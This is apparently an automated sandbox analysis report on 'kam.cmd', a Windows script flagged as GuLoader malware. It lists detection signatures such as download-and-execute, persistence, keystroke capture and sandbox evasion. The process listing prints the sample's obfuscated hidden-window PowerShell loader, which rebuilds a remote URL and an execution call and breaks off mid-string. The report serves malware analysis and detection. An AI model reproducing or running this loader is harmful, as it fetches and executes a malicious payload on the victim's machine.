Windows
Analysis Report
kam.cmd
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 1196 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\kam.c md" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 2836 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 1716 cmdline:
powershell .exe -wind owstyle hi dden "$San guinarily= 'Sub';$San guinarily+ ='strin';$ Colour = 1 ;$Sanguina rily+='g'; Function C ircuted($K ropsvisite ret26){$Bl azer=$Krop svisiteret 26.Length- $Colour;Fo r($Tvrfljt e=5;$Tvrfl jte -lt $B lazer;$Tvr fljte+=6){ $Intraperi toneally+= $Kropsvisi teret26.$S anguinaril y.Invoke( $Tvrfljte, $Colour); }$Intraper itoneally; }function Udkrte($Ud matningens ){ . ($Pol arizer) ($ Udmatninge ns);}$Onto logical=Ci rcuted 'Al enlMGynobo AnimzCopi ei Dekll U nbrlKarama D,esk/ Abs o5 edrr.C. apt0Clemp Notc(Dru,n WunifoiNai lenPr.madC o.seoUnbui wSheepsfrs te MetalNU nderTL ndq Prede1Scr ip0Postt.P enty0 dra. ;Gidsl Spn d,WP ddii. rembnBa ng 6 ,ram4B r oc;Rkebi R aasxTermt6 D.ej4 Kn. r;Ringt La ssorDiscjv Ca.bi:arch t1Bicen2Af tgt1O,tol. Sile0Sulf o)Diver Pr of.G,fglae Pen,acFalk ,k Fi,hoNe thi/Admir2 Encin0Grif f1 Tram0Cy tis0M,tro1 lufti0Kben 1Mech, Fo rblFDr.gai gkantrD,mm ee Forrf g elsoSlag,x Sia./Land e1 Un i2De not1Baand. E eb0 Sos t ';$Pullo uts=Circut ed ' Eva,U ,epousLu t leNonderMa nge- MellA Camorgbkar veTo.fun U npotZeppe ';$Skraare mmens=Circ uted 'Gim ehLusketSi dettSamlep calcas Bo. i: Circ/Ls eti/Truthw backfwRegi swUbesl. k arisDec ne ineq nCo k adBerylsRi otep licha adaptcJenh ,eGlott.Ba demcA osto .aktmD.gh t/HydropDe cimrH,spio Damas/Home od.aretlXe rot/ Desii Vi li4Gjor d1 FreeaLu pan7 alvf6 Loes ';$S pisestel=C ircuted 'B olte>Cubin ';$Polari zer=Circut ed 'S irri FlykkeRa,i dxKonst '; $Spiegelei sen='Decep halize';$T hermoreman ent12 = Ci rcuted ' H ecte Frejc ,vigehPrem ,oUdtry Ud ska%Klemea FolkpNogg gpAgnindgv enda.odset Regloaarch i%Krimi\uv .asKunivel Nonada mis hv PalbeTa l,yrOmop s Gassl.B,ds tUAposteDy ppen Eino .verl& Spr j&Te,no Sc ane Kongc ModehPolla ojejun Var u tWindi ' ;Udkrte (C ircuted 'N onsy$Indis gFeriel,an neoUgerabO utlaaAnti l,rist:Wil lyNMytolo, rocenun er sStilitBra ktuUnsh d FascySurli =Kdest(Bef orcProtom OverdVolde Flers/Und e.cDisin W habb$ G,am THjemmh ar aleScarvrS e uemUsnob oKardirRoe ddePeri,mH enhraI,dif nLurefeger man .omet ,lle1Over 2Sub.e) ,u nd ');Udkr te (Circut ed 'averr$ Luf,egFaer dlTaphvoBr u.sbArchpa Flytl Dis s:TurnePTa utoaResigr GorinaSel. kpNonaroNr meldRev,l= Co.on$Akku sSSuperk C enrActeda OplseaAf,k ir ilmeDi tam gattm T.leeLrlin nSk,bssPop ul. fyris U depsnedk l.alkiiAut ontSofav( Baro$Enkla SHygroppiq ueiheav,sM eteoeOpbud sHals tBie .dekamm.lD ydsk).orsv ');$Skraa remmens=$P arapod[0]; $Kriminalr omans= (Ci rcuted 'Or gel$Zonopg un,erlUdst oobrdskbBo stra V,ssl Unbal:Posi tAAabnin.a irbdVect,e UmedgfPagi .aP ohidVa ndleFlagsr Argene Cac tnRhota=Cy kelNEppiee Dalr wNitz h-UdradO S letbPaaklj ,oacceRaba rcSlumptSm urr DiplaS